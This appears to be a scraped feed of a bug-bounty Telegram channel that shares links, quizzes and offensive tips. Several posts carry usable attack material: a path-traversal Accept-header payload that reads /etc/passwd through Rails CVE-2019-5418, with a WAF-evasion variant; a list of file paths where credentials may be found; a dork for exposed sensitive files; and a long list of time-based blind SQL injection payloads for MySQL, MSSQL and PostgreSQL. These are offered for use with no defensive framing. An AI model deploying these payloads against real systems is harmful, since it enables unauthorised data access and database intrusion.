GitBook

Finding SSRFs in Azure DevOps

https://binarysecurity.no/posts/2025/01/finding-ssrfs-in-devops

Binary Security found three SSRF vulnerabilities in Azure DevOps that we reported to Microsoft. This blog post outlines the way we identified these vulnerabilities, and demonstrates exploitation techniques using DNS rebinding and CRLF injection.

928 views10:01

GitBook

How a Cross-Site Scripting Vulnerability Led to Account Takeover

https://www.hackerone.com/vulnerability-management/xss-deep-dive

HackerOne

How a Cross-Site Scripting Vulnerability Led to Account Takeover

Cross-site scripting (XSS) is the number one most common security vulnerability. Learn what XSS is, its impacts, and how to prevent it.

❤1

1.01K views10:01

GitBook

🔖

Top 25 JavaScript path files used to store sensitive information in Web Application⬇️

01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js

Please open Telegram to view this post

VIEW IN TELEGRAM

👍13👨‍💻2

1.22K views10:02

GitBook

https://medium.com/h7w/ultimate-ffuf-cheatsheet-advanced-fuzzing-tactics-for-pro-bug-hunters-492598750150

Medium

Ultimate FFUF Cheatsheet: Advanced Fuzzing Tactics for Pro Bug Hunters!

While many hunters are familiar with basic fuzzing techniques using FFUF (Fuzz Faster U Fool), a few truly understand its power when pushed…

1.02K views10:58

GitBook

Which curl option disables SSL/TLS certificate verification?

Anonymous Quiz

46%

-no-security-certificate

125 voters993 views10:59

GitBook

https://medium.com/bugbountywriteup/race-condition-to-bypass-rate-limiting-a-new-technique-made-by-nillsx-6a60f41dbae6

By: @Nillsxxx

Medium

Race Condition to Bypass Rate-Limiting: A new technique made by Nillsx

Hi, Security Researchers!

1.14K viewsedited 05:56

GitBook

Which of the following tools can be used for advanced GraphQL API fuzzing and testing?

Anonymous Quiz

sqlmap

48%

GraphQLMap and GraphQL Voyager

36%

Burp Suite and InQL

Metasploit Framework

128 voters1.11K views13:33

GitBook

https://t.me/addlist/PDTZT5U8zsc0OTM1
Good list channel

Cyber Sec

You’ve been invited to add the folder “Cyber Sec”, which includes 18 chats.

🔥12👍2❤1👎1

1.12K views14:07

GitBook

Zero Day Exploit THB .pdf

236.7 KB

🔖 اصطلاح "Zero-Day" زمانی استفاده می‌شود که تیم‌های امنیتی از آسیب‌پذیری نرم‌افزار خود بی‌اطلاع باشند و "0" روز فرصت داشته باشند تا روی یک پچ امنیتی یا به‌روزرسانی برای رفع مشکل کار کنند. این اصطلاح معمولاً با مفاهیم آسیب‌پذیری، اکسپلویت و تهدید ... .

✍ تهیه شده توسط : تیم ترجمه TryHackBox

Language: persian

👍5

1.14K viewsedited 16:38

GitBook

JavaScript The Definitive Guide - Flanagan.pdf

6.5 MB

JavaScript The Definitive Guide - Flanagan.pdf

👍1

1.03K views16:20

GitBook

☄️IDOR Cheat Sheet
▶️

https://jasper-join-7e5.notion.site/IDOR-Cheat-Sheet-9f7c9e3285bf4c7cae5ea38243cd0391

jasper-join-7e5 on Notion

IDOR Cheat Sheet | Notion

What if I told you that there is a web application vulnerability so simple to exploit, that it could make bug hunting feel like a breeze?

918 views04:04

GitBook

☄️HExHTTP - HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.

⚠️https://github.com/c0dejump/HExHTTP

Please open Telegram to view this post

VIEW IN TELEGRAM

👍1

851 views04:06

GitBook

🔥1

713 views04:06

GitBook

☄️Information Disclosure Dork☄️

site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)

Please open Telegram to view this post

VIEW IN TELEGRAM

👍1

708 views04:07

GitBook

▶️Automated JS Endpoint Extraction and Verification with HTTPX and GAU
echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*{};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \-json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'

Please open Telegram to view this post

VIEW IN TELEGRAM

👍1

688 views04:07

GitBook

⚡Ultimate FFUF Cheat Sheet!

🔗

https://medium.com/h7w/ultimate-ffuf-cheatsheet-advanced-fuzzing-tactics-for-pro-bug-hunters-492598750150

👍2

747 views04:07

GitBook

Testing Account Takeover Vulnerabilities.⚔️

🔥3

708 views04:07

GitBook

Google Dorking for Pentesters.pdf

1.2 MB

644 views04:08

GitBook

⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.

Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{

🛍If the server is deemed to be vulnerable, but a WAF is present:

../../../../../../e*c/p*s*d{{

✔️Credit- nav1n0x

Please open Telegram to view this post

VIEW IN TELEGRAM

611 views04:08

GitBook

timebased payloads for different dbms:

XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='

👍1

707 views04:09

About

Blog

Apps

Platform